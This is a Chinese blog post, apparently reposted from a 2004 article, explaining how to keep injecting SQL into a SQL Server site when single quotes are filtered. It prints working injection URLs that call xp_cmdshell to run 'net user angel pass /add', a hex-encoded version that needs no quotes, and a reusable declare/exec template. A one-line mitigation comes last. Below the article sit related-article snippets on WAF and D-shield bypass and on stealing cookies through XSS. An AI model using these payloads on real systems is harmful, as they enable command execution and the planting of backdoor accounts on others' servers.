饶过'(单引号)限制继续射入

最新推荐文章于 2025-01-20 17:58:34 发布
原创 最新推荐文章于 2025-01-20 17:58:34 发布 · 687 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #sql server #command #user #c

本文作者:angel
文章性质:原创
发布日期:2004-04-02
  我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:

http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--


  这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--


  是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400


  这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:

declare @a sysname
select @a=<command>
exec master.dbo.xp_cmdshell @a


解决办法:

  过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。
amh
关注
专栏目录
mysql 16进制 绕过_SQL注入WAF绕过
weixin_31796803的博客
02-01 891
SQL注入WAF绕过(1)大小写绕过此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。(2)替换关键字这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1...
sqlmap绕过d盾_记一次很迷的绕过D盾的经历
weixin_39949473的博客
12-09 2688
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D盾的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
oracle注入过滤了单引号,sql绕过单引号限制继续注入的解决方法
weixin_39547596的博客
04-05 1609
在防范sql注入时,对变量过滤不足甚至没有过滤而构造畸形SQL语句,极有可能被成功注入,比如下面这行sql,相当轻松就注入成功了:代码示例:http://www./show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--大家可能觉得变量过滤了'就可以防止SQL Injection攻击,仅仅过滤'是不够的,在'被过...
Bypass D盾_IIS防火墙SQL注入防御(多姿势)
09-14 1618
&#13; 0X01 前言&#13;   D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
过彩虹非安全认证易支付.zip
10-12
总的来说,彩虹云商城所面临的“过彩虹非安全认证易支付”问题,反映出在线支付安全方面依然存在着不容忽视的挑战。为了保护用户的利益,确保交易的安全性,彩虹云商城和第三方支付平台“易支付”必须通力合作,...
过防注入系统方法总结.txt
07-18
### 过防注入系统方法总结 #### 一、绕过防注入系统的基本原理与方法 在网络安全领域,SQL注入是一种常见的攻击手段,通过在输入字段中插入恶意SQL语句来操纵数据库的行为。为了防御这类攻击,许多网站都会采用...
初中语文文摘人生世人不知有因果因果何曾过谁
09-09
初中语文文摘人生世人不知有因果因果何曾过谁
怎么过付费 下载数据
最新发布
04-03
合法获取受付费墙保护的数据通常涉及遵循法律框架和技术规范。以下是一些方法和注意事项: ### 合法绕过付费墙的方式 #### 1....许多政府机构、学术研究组织以及非营利性团体提供了大量免费的开放数据集。...
Hook了NtCreateFile和NtReadFile能被过吗
zhangyihu321的专栏
01-20 490
在应用层面,如果同时Hook了NtCreateFile和NtReadFile,基本很难被绕过,因为这些是Windows系统最底层的文件操作API。// 使用内存映射可能绕过普通的文件读取Hook。// ... 设置trustData。// 通过编写内核驱动直接访问文件系统。// Hook其他可能的文件访问API。// 额外Hook内存映射相关API。// 检查是否试图修改代码段。// Hook内存操作相关API。// Hook文件系统过滤驱动。// 在驱动层面实现文件保护。// 检测常见调试器。
SQL注入中绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
绕过D盾,D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
网络安全——绕过
W981113的博客
01-01 4258
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
XSS绕过单引号限制
xiaopan233的博客
05-28 1万+
某视频网站,我在随处逛逛后发现了一个通过发送get请求来进行iframe连接的网页 有iframe。第一个想到的就是通过js伪代码来制造xss 所以我就简单写了一个alert 可以成功执行。没有过滤javascript:。那么我们尝试获取cookie。 也可以。并没有做过滤。那我们稍微修改一下。让cookie发到我的服务器不就可以盗取用户凭据了吗。 简单的写了个发送cooki...
通过两道CTF题学习过滤单引号SQL注入
热门推荐
Lethe's Blog
03-24 2万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1770
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 5080
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
sqlmap绕过d盾_各种姿势绕过WAF
weixin_39683858的博客
12-09 2596
常在河边走,哪有不被狗咬的,记得我刚学渗透时经常遇见"狗",一不小心就弹出这个鬼东西,以前学的那些大小写绕过之类的技巧在这狗面前根本不管用,这还渗透个屁啊!看到这个页面我相信很多小白也是头皮发麻就想放弃了,今天我带来了我家祖传的狗头铡第一种正常情况下get传参这块被各大waf厂商杀的很惨,众所周知把get改成post一样可以正常请求,同时这也是最简单的绕waf姿势把GET改为POST后把...
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4395
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整型不需要闭合就可以执行后面的语句,字符型的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值